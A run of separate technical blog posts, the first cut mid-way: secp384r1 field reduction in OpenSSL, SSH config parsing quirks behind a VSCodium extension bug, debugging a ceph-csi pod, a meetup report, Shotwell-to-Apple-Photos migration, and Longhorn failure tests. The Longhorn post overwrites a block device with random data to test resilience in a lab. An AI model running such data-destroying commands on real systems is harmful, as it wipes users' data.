Yuck. This number is so yuck in fact, that noone has so far managed to upstream a Solinas' reduction method for it in OpenSSL, in spite of secp384r1 being the preferred curve for ECDH (Elliptic Curve Diffie-Hellman key exchange) and ECDSA (Elliptic Curve Digital Signature Algorithm) by NIST.
In 56-bit limbs, we would express this number so:
Let \(f(t) = 2^{48} t^6 - 2^{16} t^2 - 2^{40} t + (2^{32} - 1)\), then observe that all coefficients are smaller than \(2^{56}\), and that \(p_{384} = f(2^{56})\).
Now let \(\delta(t) = 2^{16} t^2 + 2^{40} t - 2^{32} + 1\), consider that \(p_{384} = 2^{384} - \delta(2^{56})\), and thus \(2^{384} \equiv \delta(2^{56}) \mod{p_{384}}\). From now on let's call \(\delta(2^{56})\) just \(\delta\). Thus, 'reduction' can be achieved as follows for suitable \(X\) and \(Y\):
First make a choice of \(X\) and \(Y\). The first thing to observe here is that this can actually be made a large number of ways! We choose:
'Where does the \(2^8 t^{2}\) come from?' I hear you ask. See \(t^9 = t^2 \cdot t^7 = t^2 (2^8 \cdot 2^{384}) \equiv (2^8 t^2) \delta \mod{f(t)}\). It's clear to see that the place value of in[9] ... in[12] is greater than \(2^{384}\).
I'm using the subscripts here because we're in fact going to do a series of these reductions to reach a suitably small answer. That's because our equation for reducing \(t^7\) terms is as follows:
Thus reducing in[12] involves computing:
But \(\delta\) is a degree two polynomial, and so our numbers can still have two more limbs than we would want them to have. To be safe, let's store \(X_1 + \delta Y_1\) in accumulator limbs acc[0] ... acc[8] (this will at first appear to be one more limb than necessary), then we can eliminate in[12] with the following logic.
/* assign accumulators to begin */
for (int i = 0; i < 9; i++)
acc[i] = in[i];
/* X += 2^128 Y */
acc[8] += in[12] >> 32;
acc[7] += (in[12] & 0xffffffff) << 24;
/* X += 2^96 Y */
acc[7] += in[12] >> 8;
acc[6] += (in[12] & 0xff) << 48;
/* X += (-2^32 + 1) Y */
acc[6] -= in[12] >> 16;
acc[5] -= ((in[12] & 0xffff) << 40);
acc[6] += in[12] >> 48;
acc[5] += (in[12] & 0xffffffffffff) << 8;
Notice that for each term in \(\delta = 2^{128} + 2^{96} + (2^{32} - 1)\) we do two additions/subtractions. This is in order to split up operands in order to minimise the final size of numbers and prevent over/underflows. Consequently, we need an acc[8] to receive the high bits of our in[12] substitution given above.
Let's try and now eliminate through substitution acc[7] and acc[8]. Let
But this time, \(\delta Y_2\) is a number that comfortably can take up just five limbs, so we can update acc[0], ..., acc[5] comfortably in-place.
Finally, let's reduce all the high bits of in[6]. Since in[6] has place value \(t^6 = 2^{336}\), thus we wish to reduce all but the least significant \(384 - 336 = 48\) bits.
A goal in designing this algorithm is to ensure that acc[6] has as tight a bound as reasonably possible. Intuitively, if we can cause acc[6] to be as large as possible by absorbing the high bits of lower limbs, we reduce the number of bits that must be carried forward later on. As such, we perform a carry of the high-bits of acc[4], acc[5] into acc[6] before we begin our substitution.
Again, let
The equation for eliminating \(2^{48}t^6\) is pretty straightforward:
Finally, as each of acc[0], ..., acc[6] can contain values larger than \(2^{56}\), we carry their respective high bits into acc[6] so as to remove any redundancy. Conveniently, our preemptive carrying before the third substitution has granted us a pretty tight bound on our final calculation - the final reduced number has the range \([0, 2^{384}]\).
This is 'just the right amount of reduction' but not canonicalisation. That is, since \(0 < p_{384} < 2^{384}\), there can be multiple possible reduced values for a given congruence class. felem_contract is a method which uses the fact that \(0 \leq x < 2 p_{384}\) to further reduce the output of felem_reduce into the range \([0, p_{384})\) in constant time.
This code has many more dragons I won't explain here, but the basic premise to the calculations performed there is as follows:
Given a 385 bit input, checking whether our input (expressed as a concatenation of bits) \(b_{384}b_{383} \ldots b_1b_0\) is greater than or equal to \(p_{384}\) whose bits we denote \(q_{384}, \ldots, q_0\) (\(q_{384} = 0\)) is determined by the following logical predicate (\(G(384)\)):
With \(p_{384}\) being a Solinas'/Pseudo-Mersenne Prime, it has a large number of contiguous runs of repeated bits, so we can of course use this to massively simplify our predicate. Doing this in constant time involves some interesting bit-shifting/masking schenanigans. Essentially, you want a bit vector of all ones/zeros depending on the value of \(G(384)\), we then logically 'and' with this bitmask to 'conditionally' subtract \(p_{384}\) from our result.
Okay so we're implementing our modular arithmetic with unsigned integer limbs that together represent a number of the following form:
How do we then do subtractions in a way which will make overflow impossible? Well computing \(a - b\) is really straightforward if every limb of \(a\) is larger than every limb of \(b\). We then add a suitable multiple of \(p_{384}\) to \(a\) that causes each limb of \(a\) to be sufficiently large.
Thankfully, with redundant-limb arithmetic, we can do this easily by means of telescopic sums. For example, in felem_reduce we wanted all limbs of our \(p_{384}\) multiple to be sufficiently large. We overshot any requirement and provided such a multiple which gives a lower bound \(2^{123}\). We first scale our prime accordingly so that its 'lead term' (speaking in the polynomial representation) is \(2^{124}\).
Notice that most limbs of this multiple (the limbs will be the coefficients) are either too small or negative. We then transform this expression into a suitable telescopic sum. Observe that when \(t = 2^{56}\), \(2^{124} t^k = 2^{124-56}t^{k+1} = 2^{68} t^{k+1}\), and so simply introduce into each limb where required a \(2^{124}\) term by means of addition, subtracting the same number from a higher limb.
We can then subtract values whose limbs are no larger than the least of these limbs above without fear of underflows providing us with an incorrect result. In our case, that upper bound for limb value is \(2^{124} - 2^{116} - 2^{68} > 2^{123}\). Very comfortable.
Cryptographic routines must perform all of their calculations in constant time. More specifically, it is important that timing cryptography code should not reveal any private keys or random nonces used during computation. Ultimately, all of our work so far has been to speed up field arithmetic in the modulo field with prime \(p_{384}\). But this is done in order to facilitate calculations in the secp384r1 elliptic curve, and ECDSA/ECDH each depend on being able to perform scalar 'point multiplication' (repeat application of the group operator). Since such an operation is inherently iterative, it presents the greatest potential for timing attacks.
We implement constant-time multiplication with the wNAF ladder method. This relies on pre-computing a window of multiples of the group generator, and then scaling and selectively adding multiples when required. Wikipedia provides a helpful primer to this method by cumulatively building upon more naive approaches.
While the resulting code borrows from and uses common language of Solinas reduction, ultimately there are a number of implementation decisions that were guided by heuristic - going from theory to implementation was far from cut-and-dry. The limb size, carry order, choice of substitutions as well as pre and post conditions made here are ultimately arbitrary. You could easily imagine there being further refinements obtaining a better result. For now, I hope this post serves to demystify the inner workings of ECC implementations in OpenSSL. These algorithms, although particular and sophisticated, need not be immutable.
I've been using the VSCodium
Open Remote - SSH
extension recently to great results. I can treat everything as a single
environment, without any worry about syncing between my local development files
and the remote. This is very different to mounting the remote as a network drive
and opening a local instance of VSCodium on it: in addition to crippling latency
on every action, a locally mounted drive doesn't bring the build context that
tools like clangd require (e.g., system headers).
Instead, the remote extension runs a server on the remote that performs most actions, and the local VSCodium instance acts as a client that buffers and caches data seamlessly, so the experience is nearly as good as developing locally.
For example, a project wide file search on a network drive is unusably slow because every file and directory read requires a round trip back to the remote, and the latency is just too large to finish getting results back in a reasonable time. But with the client-server approach, the client just sends the search request to the server for it to fulfil, and all the server has to do is send the matches back. This eliminates nearly all the latency effects, except for the initial request and receiving any results.
However there has been one issue with using this for everything: the extension failed to connect when I wasn't on the same network as the host machine. So I wasn't able to use it when working from home over a VPN. In this post we find out why this happened, and in the process look at some of the weird quirks of parsing an SSH config.
As above, I wasn't able to connect to my remote machines when working from home. The extension would abort with the following error:
[Error - 00:23:10.592] Error resolving authority
Error: getaddrinfo ENOTFOUND remotename.ozlabs.ibm.com
at GetAddrInfoReqWrap.onlookup [as oncomplete] (node:dns:109:26)
So it's a DNS issue. This would make sense, as the remote machine is not exposed to the internet, and must instead be accessed through a proxy. What's weird is that the integrated terminal in VSCodium has no problem connecting to the remote. So the extension seems to be doing something different than just a plain SSH connection.
You might think that the extension is not reading the SSH config. But the extension panel lists all the host aliases I've declared in the config, so it's clearly aware of the config at least. Possibly it doesn't understand the proxy config correctly? If it was trying to connect directly from the host, it would make sense to fail a DNS lookup.
Enough theorising, time to debug the extension as it tries to connect.
From the error above, the string "Error resolving authority" looks like
something I can search for. This takes me to the
catch case for a large try-catch block.
It could be annoying to narrow down which part of the block
throws the exception, but fortunately debugging is as easy as installing the
dependencies and running the pre-configured 'Extension' debug target. This opens
a new window with the local copy of the extension active, and I can debug it in
the original window.
In this block, there is a conditional statement on whether the ProxyJump field
is present in the config. This is a good place to break on and see what the
computed config looks like. If it doesn't find a proxy then of course it's going
to run everything on the host.
And indeed, it doesn't think there is a proxy. This is progress, but why does
the extension's view of the config not match up with what SSH does? After all,
invoking SSH directly connects properly. Tracing back the source of the config
in the extension, it ultimately comes from manually reading in and parsing the
SSH config. When resolving the host argument it manually computes the config as
per ssh_config(5).
Yet somewhere it makes a mistake, because it doesn't include the ProxyJump
field.
To get to the bottom of this, we need to know the rules behind parsing SSH
configs. The ssh_config(5) manpage does a pretty decent job of explaining
this, but I'm going to go over the relevant information here. I reckon most
people have a vague idea of how it works, and can write enough to meet their
needs, but have never looked deeper into the actual rules behind how SSH parses
the config.
For starters, the config is parsed line by line. Leading whitespace (i.e.,
indentation) is ignored. So, while indentation makes it look like you are
configuring properties for a particular host, this isn't quite correct.
Instead, the Host and Match lines are special statements that enable or
disable all subsequent lines until the next Host or Match.
There is no backtracking; previous conditions and lines are not re-evaluated after learning more about the config later on.
When a config line is seen, and is active thanks to the most recent Host or
Match succeeding, its value is selected if it is the first of that config
to be selected. So the earliest place a value is set takes priority; this may
be a little counterintuitive if you are used to having the latest value be
picked, like enable/disable command line flags tend to work.
When HostName is set, it replaces the host value in Match matches. It
is also used as the Host value during a final pass (if requested).
The last behaviour of interest is the Match final rule. There are several
conditions a Match statement can have, and the final rule says make this
active on the final pass over the config.
Wait, final pass? Multiple passes? Yes. If final is a condition on a Match,
SSH will do another pass over the entire config, following all the rules above.
Except this time all the configs we read on the first pass are still active (and
can't be changed). But all the Host and Matches are re-evaluated, allowing
other configs to potentially be set. I guess that means rule (1) ought to have a
big asterisk next to it.
Together, these rules can lead to some quirky behaviours. Consider the following config
Match host="*.ozlabs.ibm.com"
ProxyJump proxy
Host example
HostName example.ozlabs.ibm.com
If I run ssh example on the command line, will it use the proxy?
By rule (1), no. When testing the first Match host condition, our host value
is currently example. It is not until we reach the HostName config that we
start using example.ozlabs.ibm.com for these matches.
But by rule (4), the answer turns into maybe. If we end up doing a second pass
over the config thanks to a Match final that could be anywhere else, we
would now be matching example.ozlabs.ibm.com against the first line on the
second go around. This will pass, and, since nothing has set ProxyJump yet, we
would gain the proxy.
You may think, yes, but we don't have a Match final in that example. But if
you thought that, then you forgot about the system config.
The system config is effectively appended to the user config, to allow any
system wide settings. Most of the time this isn't an issue because of the
first-come-first-served rule with config matches (rule 2). But if the system
config includes a Match final, it will trigger the entire config to be
re-parsed, including the user section. And it so happens that, at least on
Fedora with the openssh-clients package installed, the system config does
contain a Match final (see /etc/ssh/ssh_config.d).
But wait, there's more! If we want to specify a custom SSH config file, then we
can use -F path/to/config in the command line. But this disables loading a
system config, so we would no longer get the proxy!
To sum up, for the above config:
ssh example doesn't have a proxyMatch finalssh -F ~/.ssh/config example definitely won't have
the proxyssh example while trying to resolve another
host, it'll probably not add the -F ~/.ssh/config, so we might get the
proxy again (in the child process).Wait, how did that last one slip in? Well, unlike environment variables, it's a
lot harder for processes to propagate command line flags correctly. If resolving
the config involves running a script that itself tries to run SSH, chances are
the -F flag won't be propagated and you'll see some weird behaviour.
I swear that's all for now, you've probably learned more about SSH configs than you will ever need to care about.
Alright, armed now with this knowledge on SSH config parsing, we can work out
what's going on with the extension. It ends up being a simple issue: it doesn't
apply rules (3) and (4), so all Host matches are done against the original
host name.
In my case, there are several machines behind the proxy, but they all share a
common suffix, so I had a Host *.ozlabs.ibm.com rule to apply the proxy. I
also use aliases to refer to the machines without the .ozlabs.ibm.com suffix,
so failing to follow rule (3) lead to the situation where the extension didn't
think there was a proxy.
However, even if this were to be fixed, it still doesn't respect rule (4), or most complex match logic in general. If the hostname bug is fixed then my setup would work, but it's less than ideal to keep playing whack-a-mole with parsing bugs. It would be a lot easier if there was a way to just ask SSH for the config that a given host name resolves to.
Enter ssh -G. The -G flag asks SSH to dump the complete resolved config,
without actually opening the connection (it may execute arbitrary code while
resolving the config however!). So to fix the extension once and for all, we
could swap the manual parser to just invoking ssh -G example, and parsing the
output as the final config. No Host or Match or HostName or Match final
quirks to worry about.
Sure enough, if we replace the config backend with this 'native' resolver, we can connect to all the machines with no problem. Hopefully the pull request to add this support will get accepted, and I can stop running my locally patched copy of the extension.
In general, I'd suggest avoiding any dependency on a second pass being done on
the config. Resolve your aliases early, so that the rest of your matches work
against the full hostname. If you later need to match against the name passed in
the command line, you can use Match originalhost=example. The example above
should always be written as
Host example
HostName example.ozlabs.ibm.com
Match host="*.ozlabs.ibm.com"
ProxyJump proxy
even if the reversed order might appear to work thanks to the weird interactions
described above. And after learning these parser quirks, I find the idea of
using Host match statements unreliable; that they may or may not be run
against the HostName value allows for truely strange bugs to appear. Maybe you
should remove this uncertainty by starting your config with Match final to at
least always be parsed the same way.
Last week I had occasion to test deploying ceph-csi on a k3s cluster, so that Kubernetes workloads could access block storage provided by an external Ceph cluster. I went with the upstream Ceph documentation, because assuming everything worked it’d then be really easy for me to say to others “just go do this”.
Everything did not work.
I’d gone through all the instructions, inserting my own Ceph cluster’s FSID and MON IP addresses in the right places, applied the YAML to deploy the provisioner and node plugins, and all the provisioner bits were running just fine, but the csi-rbdplugin pods were stuck in CrashLoopBackOff:
> kubectl get pods NAME READY STATUS RESTARTS AGE csi-rbdplugin-22zjr 1/3 CrashLoopBackOff 107 (3m55s ago) 2d csi-rbdplugin-pbtc2 1/3 CrashLoopBackOff 104 (3m33s ago) 2d csi-rbdplugin-provisioner-9dcfd56d7-c8s72 7/7 Running 28 (35m ago) 8d csi-rbdplugin-provisioner-9dcfd56d7-hcztz 7/7 Running 28 (35m ago) 8d csi-rbdplugin-provisioner-9dcfd56d7-w2ctc 7/7 Running 28 (35m ago) 8d csi-rbdplugin-r2rzr 1/3 CrashLoopBackOff 106 (3m39s ago) 2d
The csi-rbdplugin pod consists of three containers – driver-registrar, csi-rbdplugin, liveness-prometheus – and csi-rbdplugin wasn’t able to load the rbd kernel module:
> kubectl logs csi-rbdplugin-22zjr --container csi-rbdplugin I0726 10:25:12.862125 7628 cephcsi.go:199] Driver version: canary and Git version: d432421a88238a878a470d54cbf2c50f2e61cdda I0726 10:25:12.862452 7628 cephcsi.go:231] Starting driver type: rbd with name: rbd.csi.ceph.com I0726 10:25:12.865907 7628 mount_linux.go:284] Detected umount with safe 'not mounted' behavior E0726 10:25:12.872477 7628 rbd_util.go:303] modprobe failed (an error (exit status 1) occurred while running modprobe args: [rbd]): "modprobe: ERROR: could not insert 'rbd': Key was rejected by service\n" F0726 10:25:12.872702 7628 driver.go:150] an error (exit status 1) occurred while running modprobe args: [rbd]
Matching “modprobe: ERROR: could not insert ‘rbd’: Key was rejected by service” in the above was an error on each host’s console: “Loading of unsigned module is rejected”. These hosts all have secure boot enabled, so I figured it had to be something to do with that. So I logged into one of the hosts and ran modprobe rbd as root, but that worked just fine. No key errors, no unsigned module errors. And once I’d run modprobe rbd (and later modprobe nbd) on the host, the csi-rbdplugin container restarted and worked just fine.
So why wouldn’t modprobe work inside the container? /lib/modules from the host is mounted inside the container, the container has the right extra privileges… Clearly I needed to run a shell in the failing container to poke around inside when it was in CrashLoopBackOff state, but I realised I had no idea how to do that. I knew I could kubectl exec -it csi-rbdplugin-22zjr --container csi-rbdplugin -- /bin/bash but of course that only works if the container is actually running. My container wouldn’t even start because of that modprobe error.
Having previously spent a reasonable amount of time with podman, which has podman run, I wondered if there were a kubectl run that would let me start a new container using the upstream cephcsi image, but running a shell, instead of its default command. Happily, there is a kubectl run, so I tried it:
> kubectl run -it cephcsi --image=quay.io/cephcsi/cephcsi:canary --rm=true --command=true -- /bin/bash If you don't see a command prompt, try pressing enter. [root@cephcsi /]# modprobe rbd modprobe: FATAL: Module rbd not found in directory /lib/modules/5.14.21-150400.24.66-default [root@cephcsi /]# ls /lib/modules/ [root@cephcsi /]#
Ohhh, right, of course, that doesn’t have the host’s /lib/modules mounted. podman run lets me add volume mounts using -v options , so surely kubectl run will let me do that too.
At this point in the story, the notes I wrote last week include an awful lot of swearing.
See, kubectl run doesn’t have a -v option to add mounts, but what it does have is an --overrides option to let you add a chunk of JSON to override the generated pod. So I went back to the relevant YAML and teased out the bits I needed to come up with this monstrosity:
> kubectl run -it cephcsi-test \
--image=quay.io/cephcsi/cephcsi:canary --rm=true \
--overrides='{
"apiVersion": "v1",
"spec": {
"containers": [ {
"name": "cephcsi",
"command": ["/bin/bash"],
"stdin": true, "tty": true,
"image": "quay.io/cephcsi/cephcsi:canary",
"volumeMounts": [ {
"mountPath": "/lib/modules", "name": "lib-modules" }],
"securityContext": {
"allowPrivilegeEscalation": true,
"capabilities": { "add": [ "SYS_ADMIN" ] },
"privileged": true }
} ],
"volumes": [ {
"name": "lib-modules",
"hostPath": { "path": "/lib/modules", "type": "" }
} ]
} }'
But at least I could get a shell and reproduce the problem:
> kubectl run -it cephcsi-test [honking great horrible chunk of JSON] [root@cephcsi-test /]# ls /lib/modules/ 5.14.21-150400.24.66-default [root@cephcsi-test /]# modprobe rbd modprobe: ERROR: could not insert 'rbd': Key was rejected by service
A certain amount more screwing around looking at the source for modprobe and bits of the kernel confirmed that the kernel really didn’t think the module was signed for some reason (mod_verify_sig() was returning -ENODATA), but I knew these modules were fine, because I could load them on the host. Eventually I hit on this:
[root@cephcsi-test /]# ls /lib/modules/*/kernel/drivers/block/rbd* /lib/modules/5.14.21-150400.24.66-default/kernel/drivers/block/rbd.ko.zst
Wait, what’s that .zst extension? It turns out we (SUSE) have been shipping zstd-compressed kernel modules since – as best as I can tell – some time in 2021. modprobe on my SLE Micro 5.3 host of course supports this:
# grep PRETTY /etc/os-release PRETTY_NAME="SUSE Linux Enterprise Micro for Rancher 5.3" # modprobe --version kmod version 29 +ZSTD +XZ +ZLIB +LIBCRYPTO -EXPERIMENTAL
modprobe in the CentOS Stream 8 upstream cephcsi container does not:
[root@cephcsi-test /]# grep PRETTY /etc/os-release PRETTY_NAME="CentOS Stream 8" [root@cephcsi-test /]# modprobe --version kmod version 25 +XZ +ZLIB +OPENSSL -EXPERIMENTAL
Mystery solved, but I have to say the error messages presented were spectacularly misleading. I later tried with secure boot disabled, and got something marginally better – in that case modprobe failed with “modprobe: ERROR: could not insert ‘rbd’: Exec format error”, and dmesg on the host gave me “Invalid ELF header magic: != \x7fELF”. If I’d seen messaging like that in the first place I might have been quicker to twig to the compression thing.
Anyway, the point of this post wasn’t to rant about inscrutable kernel errors, it was to rant about how there’s no way anyone could be reasonably expected to figure out how to do that --overrides thing with the JSON to debug a container stuck in CrashLoopBackOff. Assuming I couldn’t possibly be the first person to need to debug containers in this state, I told my story to some colleagues, a couple of whom said (approximately) “Oh, I edit the pod YAML and change the container’s command to tail -f /dev/null or sleep 1d. Then it starts up just fine and I can kubectl exec into it and mess around”. Those things totally work, and I wish I’d thought to do that myself. The best answer I got though was to use kubectl debug to make a copy of the existing pod but with the command changed. I didn’t even know kubectl debug existed, which I guess is my reward for not reading the entire manual 
So, finally, here’s the right way to do what I was trying to do:
> kubectl debug csi-rbdplugin-22zjr -it \
--copy-to=csi-debug --container=csi-rbdplugin -- /bin/bash
[root@... /]# modprobe rbd
modprobe: ERROR: could not insert 'rbd': Key was rejected by service
(...do whatever other messing around you need to do, then...)
[root@... /]# exit
Session ended, resume using 'kubectl attach csi-debug -c csi-rbdplugin -i -t' command when the pod is running
> kubectl delete pod csi-debug
pod "csi-debug" deleted
In the above kubectl debug invocation, csi-rbdplugin-22zjr is the existing pod that’s stuck in CrashLoopBackOff, csi-debug is the name of the new pod being created, and csi-rbdplugin is the container in that pod that has its command replaced with /bin/bash, so you can mess around inside it.
The July 2023 meeting sparked multiple new topics including Linux security architecture, Debian ports of LoongArch and Risc-V as well as hardware design of PinePhone backplates.
On the practical side, Russell Coker demonstrated running different applications in isolated environment with bubblewrap sandbox, as well as other hardening techniques and the way they interact with the host system. Russell also discussed some possible pathways of hardening desktop Linux to reach the security level of modern Android. Yifei Zhan demonstrated sending and receiving messages with the PineDio USB LoRa adapter and how to inspect LoRa signal with off-the-shelf software defined radio receiver, and discussed how the driver situation for LoRa on Linux might be improved. Yifei then gave a demonstration on utilizing KVM on PinePhone Pro to run NetBSD and OpenBSD virtual machines, more details on running VMs on the PinePhone Pro can be found on this blog post from Yifei.
We also had some discussion of the current state of Mobian and Debian ecosystem, along with how to contribute to different parts of Mobian with a Mobian developer who joined us.
Somewhat a while ago now, I wrote about how every time I return to write some software for the Mac, the preferred language has changed. The purpose of this adventure was to get my photos out of the aging Shotwell and onto my (then new) Mac and the Apple Photos App.
I’ve had a pretty varied experience with photo management on Linux over the past couple of decades. For a while I used f-spot as it was the new hotness. At some point this became…. slow and crashy enough that it was unusable. Today, it appears that the GitHub project warns that current bugs include “Not starting”.
At some point (and via a method I have long since forgotten), I did manage to finally get my photos over to Shotwell, which was the new hotness at the time. That data migration was so long ago now I actually forget what features I was missing from f-spot that I was grumbling about. I remember the import being annoying though. At some point in time Shotwell was no longer was the new hotness and now there is GNOME Photos. I remember looking at GNOME Photos, and seeing no method of importing photos from Shotwell, so put it aside. Hopefully that situation has improved somewhere.
At some point Shotwell was becoming rather stagnated, and I noticed more things stopping to work rather than getting added features and performance. The good news is that there has been some more development activity on Shotwell, so hopefully my issues with it end up being resolved.
One recommendation for Linux photo management was digiKam, and one that I never ended up using full time. One of the reasons behind that was that I couldn’t really see any non manual way to import photos from Shotwell into it.
With tens of thousands of photos (~58k at the time of writing), doing things manually didn’t seem like much fun at all.
As I postponed my decision, I ended up moving my main machine over to a Mac for a variety of random reasons, and one quite motivating thing was the ability to have Photos from my iPhone magically sync over to my photo library without having to plug it into my computer and copy things across.
So…. how to get photos across from Shotwell on Linux to Photos on a Mac/iPhone (and also keep a very keen eye on how to do it the other way around, because, well, vendor lock-in isn’t great).
It would be kind of neat if I could just run Shotwell on the Mac and have some kind of import button, but seeing as there wasn’t already a native Mac port, and that Shotwell is written in Vala rather than something I know has a working toolchain on macOS…. this seemed like more work than I’d really like to take on.
Luckily, I remembered that Shotwell’s database is actually just a SQLite database pointing to all the files on disk. So, if I could work out how to read it accurately, and how to import all the relevant metadata (such as what Albums a photo is in, tags, title, and description) into Apple Photos, I’d be able to make it work.
So… is there any useful documentation as to how the database is structured?
Semi annoyingly, Shotwell is written in Vala, a rather niche programming language that while integrating with all the GObject stuff that GNOME uses, is largely unheard of. Luckily, the database code in Shotwell isn’t too hard to read, so was a useful fallback for when the documentation proves inadequate.
So, I armed myself with the following resources:
Programming the Mac side of things, it was a good excuse to start looking at Swift, so knowing I’d also need to read a SQLite database directly (rather than use any higher level abstraction), I armed myself with the following resources:
From here, I could work on getting the first half going, the ability to view my Shotwell database on the Mac (which is what I posted a screenshot of back in Feb 2022).
But also, I had to work out what I was doing on the other end of things, how would I import photos? It turns out there’s an API!
A bit of SwiftUI code:
import SwiftUI
import AppKit
import Photos
struct ContentView: View {
@State var favorite_checked : Bool = false
@State var hidden_checked : Bool = false
var body: some View {
VStack() {
Text("Select a photo for import")
Toggle("Favorite", isOn: $favorite_checked)
Toggle("Hidden", isOn: $hidden_checked)
Button("Import Photo")
{
let panel = NSOpenPanel()
panel.allowsMultipleSelection = false
panel.canChooseDirectories = false
if panel.runModal() == .OK {
let photo_url = panel.url!
print("selected: " + String(photo_url.absoluteString))
addAsset(url: photo_url, isFavorite: favorite_checked, isHidden: hidden_checked)
}
}
.padding()
}
}
}
struct ContentView_Previews: PreviewProvider {
static var previews: some View {
ContentView()
}
}
Combined with a bit of code to do the import (which does look a bunch like the examples in the docs):
import SwiftUI
import Photos
import AppKit
@main
struct SinglePhotoImporterApp: App {
var body: some Scene {
WindowGroup {
ContentView()
}
}
}
func addAsset(url: URL, isFavorite: Bool, isHidden: Bool) {
// Add the asset to the photo library.
let path = "/Users/stewart/Pictures/1970/01/01/1415446258647.jpg"
let url = URL(fileURLWithPath: path)
PHPhotoLibrary.shared().performChanges({
let addedImage = PHAssetChangeRequest.creationRequestForAssetFromImage(atFileURL: url)
addedImage?.isHidden = isHidden
addedImage?.isFavorite = isFavorite
}, completionHandler: {success, error in
if !success { print("Error creating the asset: \(String(describing: error))") } else
{
print("Imported!")
}
})
}
This all meant I could import a single photo. However, there were some limitations.
There’s the PHAssetCollectionChangeRequest to do things to Albums, so it would solve that problem, but I couldn’t for the life of me work out how to add/edit Titles and Descriptions.
It was so close!
So what did I need to do in order to import Titles and Descriptions? It turns out you can do that via AppleScript. Yes, that thing that launched in 1993 and has somehow survived the transition of m68k based Macs to PowerPC based Macs to Intel based Macs to ARM based Macs.
So, just to make it easier to debug what was going on, I started adding code to my ShotwellImporter tool that would generate snippets of AppleScript I could run and check that it was doing the right thing…. but then very quickly ran into a problem…. it appears that the AppleScript language interpreter on modern macOS has limits that you’d be more familiar with in 1993 than 2023, and I very quickly hit limits where the script would just error out before running (I was out of dictionary size allegedly).
But there’s a new option! Everything you can do with AppleScript you can now do with JavaScript – it’s just even less documented than AppleScript is! But it does work! I got to the point where I could generate JavaScript that imported photos, into all the relevant albums, and set title and descriptions.
A useful write up of using JavaScript rather than AppleScript to do things with Photos: https://mudge.name/2019/11/13/scripting-photos-for-macos-with-javascript/
More recent than when I was doing my hacking, https://alexwlchan.net/2023/managing-albums-in-photos/ is a good read.
With luck I’ll find some time to write up a bit of a walkthrough of my code, and push it up somewhere.
In my last post, I wrote about how I taught sesdev (originally a tool for deploying Ceph clusters on virtual machines) to deploy k3s, because I wanted a little sandbox in which I could break learn more about Kubernetes. It’s nice to be able to do a toy deployment locally, on a bunch of VMs, on my own hardware, in my home office, rather than paying to do it on someone else’s computer. Given the k3s thing worked, I figured the next step was to teach sesdev how to deploy Longhorn so I could break that learn more about that too.
Teaching sesdev to deploy Longhorn meant asking it to:
/dev/vdb on all the nodes that have extra disks, then mount that on /var/lib/longhorn.kubectl label node -l 'node-role.kubernetes.io/master!=true' node.longhorn.io/create-default-disk=true to ensure Longhorn does its storage thing only on the nodes that aren’t the k3s master.So, now I can do this:
> sesdev create k3s --deploy-longhorn
=== Creating deployment "k3s-longhorn" with the following configuration ===
Deployment-wide parameters (applicable to all VMs in deployment):
- deployment ID: k3s-longhorn
- number of VMs: 5
- version: k3s
- OS: tumbleweed
- public network: 10.20.78.0/24
Proceed with deployment (y=yes, n=no, d=show details) ? [y]: y
=== Running shell command ===
vagrant up --no-destroy-on-error --provision
Bringing machine 'master' up with 'libvirt' provider…
Bringing machine 'node1' up with 'libvirt' provider…
Bringing machine 'node2' up with 'libvirt' provider…
Bringing machine 'node3' up with 'libvirt' provider…
Bringing machine 'node4' up with 'libvirt' provider…
[... lots more log noise here - this takes several minutes... ]
=== Deployment Finished ===
You can login into the cluster with:
$ sesdev ssh k3s-longhorn
Longhorn will now be deploying, which may take some time.
After logging into the cluster, try these:
# kubectl get pods -n longhorn-system --watch
# kubectl get pods -n longhorn-system
The Longhorn UI will be accessible via any cluster IP address
(see the kubectl -n longhorn-system get ingress output above).
Note that no authentication is required.
…and, after another minute or two, I can access the Longhorn UI and try creating some volumes. There’s a brief period while the UI pod is still starting where it just says “404 page not found”, and later after the UI is up, there’s still other pods coming online, so on the Volume screen in the Longhorn UI an error appears: “failed to get the parameters: failed to get target node ID: cannot find a node that is ready and has the default engine image longhornio/longhorn-engine:v1.4.1 deployed“. Rest assured this goes away in due course (it’s not impossible I’m suffering here from rural Tasmanian internet lag pulling container images). Anyway, with my five nodes – four of which have an 8GB virtual disk for use by Longhorn – I end up with a bit less than 22GB storage available:
Now for the fun part. Longhorn is a distributed storage solution, so I thought it would be interesting to see how it handled a couple of types of failure. The following tests are somewhat arbitrary (I’m really just kicking the tyres randomly at this stage) but Longhorn did, I think, behave pretty well given what I did to it.
Volumes in Longhorn consist of replicas stored as sparse files on a regular filesystem on each storage node. The Longhorn documentation recommends using a dedicated disk rather than just having /var/lib/longhorn backed by the root filesystem, so that’s what sesdev does: /var/lib/longhorn is an ext4 filesystem mounted on /dev/vdb. Now, what happens to Longhorn if that underlying block device suffers some kind of horrible failure? To test that, I used the Longhorn UI to create a 2GB volume, then attached that to the master node:
Then, I ssh’d to the master node and with my 2GB Longhorn volume attached, made a filesystem on it and created a little file:
> sesdev ssh k3s-longhorn
Have a lot of fun...
master:~ # cat /proc/partitions
major minor #blocks name
253 0 44040192 vda
253 1 2048 vda1
253 2 20480 vda2
253 3 44016623 vda3
8 0 2097152 sda
master:~ # mkfs /dev/sda
mke2fs 1.46.5 (30-Dec-2021)
Discarding device blocks: done
Creating filesystem with 524288 4k blocks and 131072 inodes
Filesystem UUID: 3709b21c-b9a2-41c1-a6dd-e449bdeb275b
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912
Allocating group tables: done
Writing inode tables: done
Writing superblocks and filesystem accounting information: done
master:~ # mount /dev/sda /mnt
master:~ # echo foo > /mnt/foo
master:~ # cat /mnt/foo
foo
Then I went and trashed the block device backing one of the replicas:
> sesdev ssh k3s-longhorn node3 Have a lot of fun... node3:~ # ls /var/lib/longhorn engine-binaries longhorn-disk.cfg lost+found replicas unix-domain-socket node3:~ # dd if=/dev/urandom of=/dev/vdb bs=1M count=100 100+0 records in 100+0 records out 104857600 bytes (105 MB, 100 MiB) copied, 0.486205 s, 216 MB/s node3:~ # ls /var/lib/longhorn node3:~ # dmesg|tail -n1 [ 6544.197183] EXT4-fs error (device vdb): ext4_map_blocks:607: inode #393220: block 1607168: comm longhorn: lblock 0 mapped to illegal pblock 1607168 (length 1)
At this point, the Longhorn UI still showed the volume as green (healthy, ready, scheduled). Then, back on the master node, I tried creating another file:
master:~ # echo bar > /mnt/bar master:~ # cat /mnt/bar bar
That’s fine so far, but suddenly the Longhorn UI noticed that something very bad had happened:
